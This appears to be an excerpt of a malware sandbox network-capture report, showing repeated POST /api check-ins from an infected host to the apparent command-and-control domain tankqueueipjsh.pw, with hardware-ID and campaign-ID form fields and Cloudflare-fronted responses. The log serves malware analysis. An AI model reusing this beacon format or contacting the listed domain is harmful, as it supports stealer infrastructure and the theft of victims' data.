                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rKtgPtQ1IaMZBy%2Fg3N1w650VWyWr9lGBMZWcl12qCy2Z7zvpxNvv5S0lvXgx5N6lkRVVDGVY%2BwqmnTlJ%2FvIQSE%2FSX1%2BrgB7sowMOGhxsMIm9NdEkb00N%2BKP1sTfID86ezybABA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.634785891 CET126INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 37 31 30 63 30 34 32 34 33 30 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cloudflareCF-RAY: 8314e9710c042430-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.634797096 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        47192.168.2.550233104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.858971119 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.859111071 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.222261906 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vug7qh4d5h52el8po9nk1tunfi; expires=Sun, 31 Mar 2024 07:22:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PlTQ89W56bpypyVx97aWtkx86ghKChAMdSwcMIv9OsCSJPt9Eba0UEwBDowJCJhnCEzu05OXyT3HdJ88bzeyzFW9mLcCyN%2BSWYN2R4kqaU9IHRjX203QMkG7sR%2BmXX%2Fo6cwTwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.222322941 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 37 34 39 61 37 30 30 61 38 37 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9749a700a87-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.222439051 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        48192.168.2.550234104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.319895983 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.320126057 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.577699900 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=67ctr4ik434eeuk6l9t3a99jbc; expires=Sun, 31 Mar 2024 07:22:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:25 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AfutiQrx6t0NKuwkkXe29OZof8zKU4U3Rc30HYVLGzRRYgVcHJYSOiFDg9ZAuk%2FwLgQ93kWxbtrMKG9BD1hnRy2TyvHdqd4KezKHUm83mjFSLpIO2%2Be%2Bh0yItxKrB8heVeyeLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.577738047 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 37 37 37 39 65 32 31 66 64 64 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e97779e21fdd-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:25.577773094 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        49192.168.2.550235104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.052238941 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.052366972 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.309511900 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:26 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=2qim5akrmsmfjpa2q86i5ms8or; expires=Sun, 31 Mar 2024 07:22:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Fl8vctaEGAymKLvpWR4RRUyF5PDqkauZ%2Bfj1k805eqFyjEV1cjMU2iz4tTKnpriMfmCTmoShTOhFNURQYvMzxL4sXxL3cFziGszhEOIJptSH00kC7nD23mfB%2BDdKpZrJCqxBxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.309568882 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 37 63 31 39 61 64 35 38 61 38 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e97c19ad58a8-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.309691906 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        50192.168.2.550236104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.685050964 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.685183048 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.949165106 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:26 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=tn5jejm74u7ao6j0b4m0qd3fme; expires=Sun, 31 Mar 2024 07:22:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:26 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r12VZBq89h7zP1Jh6Vec9REr9cbvSsam%2F%2FN660Zk12ctMp0yC7GVR2tkXtNyBfIfHPT2yVOYgHcR3jtPNGalU%2BdwxNl86jO25uZg%2FvXvq6hE8ncifrBDEgFMZUmHUIYQD3amNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.949194908 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 38 30 30 61 35 35 33 39 62 32 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e9800a5539b2-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:26.949210882 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        51192.168.2.550237104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.096498013 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.096801043 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.467818022 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=suubu5lj8vsjdm09t84pn76jnr; expires=Sun, 31 Mar 2024 07:22:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hz80xrAUb0CJSnIen%2B8M6hvYS393YVi0azCcER8g3qY0swCzfijCdpW7oNseA5p2sTXBf8SuPYmCUNdqkSMa1C69wmZlScXbIrbKwCK6lut2k9uSsFs2qkhUhTdyiH%2F9ZVv%2BPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.467856884 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 38 32 39 63 31 39 30 37 63 39 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9829c1907c9-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.470479965 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        52192.168.2.550238104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.567585945 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.567737103 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.938057899 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=e1764eqjvd20u4dgpr8b5co42t; expires=Sun, 31 Mar 2024 07:22:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:27 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3jfz2q3TF7e9BXteKsULukUka3R67C0RFusDDX4We1WJTB%2BOFVSpJShTUdIyDrYchFDH0Khn6GSYRPdomHgNi8Sr5lzcUJeVPBrJsxmduQApkNdPT2V4Nbj0rHXE6me4spCepQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudfla
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
